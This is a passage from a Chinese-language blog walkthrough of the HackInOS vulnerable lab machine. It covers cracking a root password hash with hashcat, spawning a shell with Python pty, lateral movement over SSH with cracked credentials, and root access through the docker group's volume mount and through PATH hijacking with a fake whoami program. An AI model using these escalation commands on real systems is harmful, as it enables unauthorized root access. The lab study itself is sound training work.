<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# hashcat -w 3 -a 0 -m 1800 -o root.out root.hash /usr/share/metasploit-framework/data/wordlists/common_roots.txt --force</span><br></pre></td></tr></table></figure>

<p>得到密码：john</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# cat root.out</span><br><span class="line">$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:john</span><br></pre></td></tr></table></figure>

<p>于是我们su root，但是发现：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">su root</span><br><span class="line">su: must be run from a terminal</span><br></pre></td></tr></table></figure>

<p>所以我们用python伪造一个终端，然后来su root:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;);&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/blog.github.io/images/818602_GFGWBKCNDU8JZEH.png" alt="818602_GFGWBKCNDU8JZEH"><br>然后拿到了flag:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">root@1afdd1f6b82c:/var/www/html# cd</span><br><span class="line">cd</span><br><span class="line">root@1afdd1f6b82c:~# ls</span><br><span class="line">ls</span><br><span class="line">flag</span><br><span class="line">root@1afdd1f6b82c:~# cat flag</span><br><span class="line">cat flag</span><br><span class="line">Life consists of details..</span><br></pre></td></tr></table></figure>

<h3 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h3><p>很明显这不是真正的flag，我们刚才还得到了一个数据库密码，所以我们登录看看：<br><img src="/blog.github.io/images/818602_2QF62MW9W7659XG.png" alt="818602_2QF62MW9W7659XG"><br>我们这里发现一个用户名和密码，之前扫描端口是发现一个22端口，所以这个可能是ssh的登录信息，这个密码md5解密出来后是123456；<br>我们登录试试：<br><img src="/blog.github.io/images/818602_APP4J4WFDRXJ39Y.png" alt="818602_APP4J4WFDRXJ39Y"><br>登录成功，但是我们发现权限还是低，所以这里又要提权….</p>
<h3 id="提取2"><a href="#提取2" class="headerlink" title="提取2"></a>提取2</h3><p>我们看这个用户名特别像在docker里面，查看一下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hummingbirdscyber@vulnvm:~$ id</span><br><span class="line">uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)</span><br></pre></td></tr></table></figure>

<p>确实是，因为docker权限就能读到/root中的文件了，所以可以利用docker run的-v参数，将/root挂载到容器中：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /root:/root ubuntu:latest /bin/bash</span><br></pre></td></tr></table></figure>

<p>成功获得flag:<br><img src="/blog.github.io/images/818602_Y3D2DAYVX29YT82.png" alt="818602_Y3D2DAYVX29YT82"></p>
<h3 id="命令劫持"><a href="#命令劫持" class="headerlink" title="命令劫持"></a>命令劫持</h3><p>其实最后一个提取，我们还可以利用命令劫持的方法，因为我们发现在目标机器的desktop上面有一个程序，运行之后会输出root字样，然后用strings命令还看到了whoami字样：<br><img src="/blog.github.io/images/818602_G78B4JY8YZ7J62T.png" alt="818602_G78B4JY8YZ7J62T"><br>所以，我们猜测这个程序是root权限并且程序里面掉用了system(“whoami”)命令，所以我们可以把想办法把whoami这个命令在机器上替换为system(“/bin/bash”)，利用pwn的思想来提取；<br>查找一下PATH的位置：<br><img src="/blog.github.io/images/818602_MCW3EXHE98THGFB.png" alt="818602_MCW3EXHE98THGFB"><br>现在命令劫持就非常方便了；<br>whoami.c:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">int main(void) &#123;</span><br><span class="line">    system(&quot;/bin/bash&quot;);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后我们编译它得到可执行文件whoami，然后在创建一个bin文件夹，将whoami放进去：<br><img src="/blog.github.io/images/818602_E4QQPF2ZCAUU27Y.png" alt="818602_E4QQPF2ZCAUU27Y"><br>最后运行a.out程序即可提取：<br><img src="/blog.github.io/images/818602_7R2C4QTNKTCMFF7.png" alt="818602_7R2C4QTNKTCMFF7"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/blog.github.io/tags/%E9%83%A8%E7%BD%B2/" rel="tag"><i class="fa fa-tag"></i> 部署</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog.github.io/2020/03/30/%E5%BE%85%E6%95%B4%E7%90%86%E5%AD%A6%E4%B9%A0/" rel="next" title="待整理学习">
                <i class="fa fa-chevron-left"></i> 待整理学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog.github.io/2020/04/15/%E7%B3%BB%E7%BB%9F-Kali%E5%AE%89%E8%A3%85%E9%9B%B6%E6%95%A3%E8%AE%B0%E5%BD%95/" rel="prev" title="Kali安装相关问题">
                Kali安装相关问题 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/blog.github.io/images/avatar.gif"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <!-- <a href="/blog.github.io/archives/%7C%7C%20archive"> -->
				<a href="/blog.github.io/archives">
              
                  <span class="site-state-item-count">38</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/blog.github.io/categories/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/blog.github.io/tags/index.html">
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AFHackInOS"><span class="nav-number">1.</span> <span class="nav-text">渗透思路HackInOS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E6%AD%A5%E9%AA%A4"><span class="nav-number">1.2.</span> <span class="nav-text">渗透步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E6%9C%BA%E5%99%A8ip"><span class="nav-number">1.2.1.</span> <span class="nav-text">1.获取目标机器ip</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.利用文件上传漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%90%E6%9D%831"><span class="nav-number">1.2.3.</span> <span class="nav-text">提权1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="nav-number">1.2.4.</span> <span class="nav-text">横向渗透</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%90%E5%8F%962"><span class="nav-number">1.2.5.</span> <span class="nav-text">提取2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E5%8A%AB%E6%8C%81"><span class="nav-number">1.2.6.</span> <span class="nav-text">命令劫持</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">magic</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/blog.github.io/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/blog.github.io/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/blog.github.io/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog.github.io/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/blog.github.io/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog.github.io/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/blog.github.io/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/blog.github.io/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/blog.github.io/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
